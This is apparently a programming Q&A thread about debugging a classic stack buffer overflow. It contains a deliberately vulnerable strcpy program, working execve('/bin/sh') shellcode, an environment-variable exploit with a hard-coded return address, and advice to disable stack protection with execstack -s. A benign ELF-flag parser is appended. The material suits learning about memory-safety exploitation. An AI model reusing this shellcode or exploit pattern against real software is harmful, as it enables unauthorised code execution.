
Buffer Overflow won't work, get Seg Fault

I am trying to get a buffer overflow to work. I have the following simple vulnerable program:

#include <string.h>

/* Deliberately vulnerable: strcpy has no bound, so an argv[1] longer than
 * 79 bytes runs past buffer into the saved frame pointer and return address. */
int main(int argc, char** argv) {
    char buffer[80];
    strcpy(buffer,argv[1]);   /* unbounded copy into an 80-byte stack buffer */
    return 1;
}

With the following program I want to get a shell with a buffer overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 24-byte i386 shellcode: execve("//bin/sh", ["//bin/sh", NULL], NULL) */
char shellcode[]=
"\x31\xc0"                     /* xor  eax, eax                        */
"\x50"                         /* push eax        (NUL terminator)     */
"\x68\x6e\x2f\x73\x68"         /* push "n/sh"                          */
"\x68\x2f\x2f\x62\x69"         /* push "//bi"     -> "//bin/sh" on stack */
"\x89\xe3"                     /* mov  ebx, esp   (filename)           */
"\x99"                         /* cdq             (edx = 0, envp = NULL) */
"\x52"                         /* push edx        (argv NULL terminator) */
"\x53"                         /* push ebx        (argv[0])            */
"\x89\xe1"                     /* mov  ecx, esp   (argv)               */
"\xb0\x0b"                     /* mov  al, 11     (sys_execve)         */
"\xcd\x80";                    /* int  0x80                            */
/* Address the EGG string is expected to have in the vulnerable process
 * (taken from the %p printed below), little-endian. */
char retaddr[] = "\xa8\xd5\xff\xff";
#define NOP 0x90
int main() {
    char buffer[96];

    memset(buffer, NOP, 96);                       /* fill with NOP sled */
    memcpy(buffer, "EGG=",4);                      /* environment variable name */
    memcpy(buffer+4,shellcode,24);                 /* shellcode right after "EGG=" */
    memcpy(buffer+88,retaddr,4);                   /* lands on the saved return address */
    memcpy(buffer+92, "\x00\x00\x00\x00",4);       /* terminate the string */
    putenv(buffer);                                /* export EGG into the environment */
    printf("%p\n", buffer);                        /* where the string lives in this process */
    system("/bin/sh");                             /* spawn a shell that inherits EGG */
    return 0;
}

This program creates a buffer with the shellcode at the beginning. After the shellcode are some NOP instructions and then the value that overwrites the return address and points to the beginning of the shellcode. Then it creates an environment variable from the buffer and starts a shell.

If I run that program, the shell starts and the environment variable is set. But if I try to run the vulnerable program with the environment variable as a parameter, I get a segmentation fault.

Here are some screens with gdb: I don't have enough reputation to post images directly, so here is the link to an imgur album with the 4 pictures in it.


The first picture shows the stack before the strcpy happens.

The second one shows argv[1].

The third picture shows the stack after the strcpy.

As you can see, 0xf7e00497 is the return address. If I disassemble this address, the code for the libc function is shown.

In the third picture you see that this address is overwritten by the address 0xffffd5a8, which points to the top of the stack.

In picture number 4 you see the segmentation fault if the program continues to run.

Can anybody tell me why? Everything seems to be okay? I compiled both programs with the -fno-stack-protector option of gcc.

Thanks @type1232, the issue was that the stack is not executable.

With execstack -s vulProg, the shellcode will run.
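Added example (not part of the question or of the answer quoted above): a small C program that reads the flag `execstack -s` flips. The kernel decides whether a process's stack is mapped executable from the PF_X bit of the PT_GNU_STACK program header; `execstack -s` sets that bit, `execstack -c` clears it, and `readelf -l vulProg | grep GNU_STACK` shows it as `RWE` versus `RW`. The parser below handles little-endian ELF32 and ELF64 without `<elf.h>`; run with no argument it checks two constructed in-memory ELF images (not real binaries) so it works offline. The function names `gnu_stack_state`, `build_test_elf` and `describe` are my own, not from the page.

```c
/* Added example: report whether an ELF binary requests an executable stack.
 * The kernel reads this from the PF_X bit of the PT_GNU_STACK program header;
 * `execstack -s` sets that bit, which is why the EGG shellcode only ran after it. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PT_GNU_STACK_TYPE 0x6474e551u   /* p_type value of the GNU_STACK header */
#define PF_EXEC           0x1u          /* p_flags bit: segment is executable */

enum stack_state { STACK_BAD_ELF = -1, STACK_NX = 0, STACK_EXEC = 1, STACK_NO_HDR = 2 };

/* Little-endian field reader/writer for 2-, 4- or 8-byte fields. */
static uint64_t rd(const unsigned char *p, int n) {
    uint64_t v = 0;
    for (int i = n - 1; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}
static void wr(unsigned char *p, uint64_t v, int n) {
    for (int i = 0; i < n; i++) p[i] = (unsigned char)(v >> (8 * i));
}

/* Inspect an in-memory ELF image. STACK_NO_HDR means there is no PT_GNU_STACK
 * entry at all, in which case the kernel applies its per-architecture default. */
int gnu_stack_state(const unsigned char *img, size_t len) {
    static const unsigned char magic[4] = { 0x7f, 'E', 'L', 'F' };
    if (len < 0x34 || memcmp(img, magic, 4) != 0 || img[5] != 1)
        return STACK_BAD_ELF;                           /* not a little-endian ELF */
    int is64 = (img[4] == 2);
    if (is64 && len < 0x40) return STACK_BAD_ELF;
    uint64_t phoff   = is64 ? rd(img + 0x20, 8) : rd(img + 0x1c, 4);
    unsigned phentsz = (unsigned)rd(img + (is64 ? 0x36 : 0x2a), 2);
    unsigned phnum   = (unsigned)rd(img + (is64 ? 0x38 : 0x2c), 2);
    unsigned flagoff = is64 ? 4 : 24;                   /* p_flags offset inside a phdr */
    if (phentsz < flagoff + 4) return STACK_BAD_ELF;
    for (unsigned i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsz;
        if (off + phentsz > len) return STACK_BAD_ELF;  /* truncated header table */
        if (rd(img + off, 4) != PT_GNU_STACK_TYPE) continue;
        return (rd(img + off + flagoff, 4) & PF_EXEC) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HDR;
}

/* Constructed test input, not a loadable binary: minimal little-endian ELF
 * image (file header + one PT_GNU_STACK phdr) with the given p_flags.
 * `out` must hold 120 bytes; returns the image length. */
size_t build_test_elf(unsigned char *out, int is64, uint32_t pflags) {
    memset(out, 0, 120);
    out[0] = 0x7f; out[1] = 'E'; out[2] = 'L'; out[3] = 'F';
    out[4] = is64 ? 2 : 1;                 /* EI_CLASS */
    out[5] = 1;                            /* EI_DATA: little-endian */
    if (is64) {
        wr(out + 0x20, 0x40, 8);           /* e_phoff: phdrs follow the header */
        wr(out + 0x36, 56, 2);             /* e_phentsize */
        wr(out + 0x38, 1, 2);              /* e_phnum */
        wr(out + 0x40, PT_GNU_STACK_TYPE, 4);
        wr(out + 0x44, pflags, 4);         /* p_flags at offset 4 in Elf64_Phdr */
        return 0x40 + 56;
    }
    wr(out + 0x1c, 0x34, 4);
    wr(out + 0x2a, 32, 2);
    wr(out + 0x2c, 1, 2);
    wr(out + 0x34, PT_GNU_STACK_TYPE, 4);
    wr(out + 0x34 + 24, pflags, 4);        /* p_flags at offset 24 in Elf32_Phdr */
    return 0x34 + 32;
}

static const char *describe(int st) {
    switch (st) {
    case STACK_NX:     return "GNU_STACK RW : stack NOT executable (shellcode on it faults)";
    case STACK_EXEC:   return "GNU_STACK RWE: stack executable (what execstack -s sets)";
    case STACK_NO_HDR: return "no GNU_STACK header: kernel default applies";
    default:           return "not a little-endian ELF file";
    }
}

int main(int argc, char **argv) {
    unsigned char img[120];
    if (argc < 2) {                        /* no file given: use the constructed images */
        size_t n = build_test_elf(img, 0, 0x6);   /* PF_R|PF_W */
        printf("ELF32 sample: %s\n", describe(gnu_stack_state(img, n)));
        n = build_test_elf(img, 1, 0x7);          /* PF_R|PF_W|PF_X */
        printf("ELF64 sample: %s\n", describe(gnu_stack_state(img, n)));
        return 0;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END); long sz = ftell(f); rewind(f);
    unsigned char *buf = malloc(sz > 0 ? (size_t)sz : 1);
    size_t got = buf ? fread(buf, 1, (size_t)sz, f) : 0;
    fclose(f);
    printf("%s: %s\n", argv[1], describe(gnu_stack_state(buf, got)));
    free(buf);
    return 0;
}
```

Point it at the vulnerable binary before and after `execstack -s vulProg` to watch the verdict change from RW to RWE. The caveat worth keeping in mind: the environment block, including EGG, is copied onto the new process's stack by the kernel, so it lives in the same mapping as `buffer`, and with NX in effect the `ret` into 0xffffd5a8 faults even though the overwrite itself succeeded, exactly what picture 4 shows. The hard-coded address additionally assumes the vulnerable process gets the same stack layout as the program that printed it, which only holds with address-space randomisation disabled.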
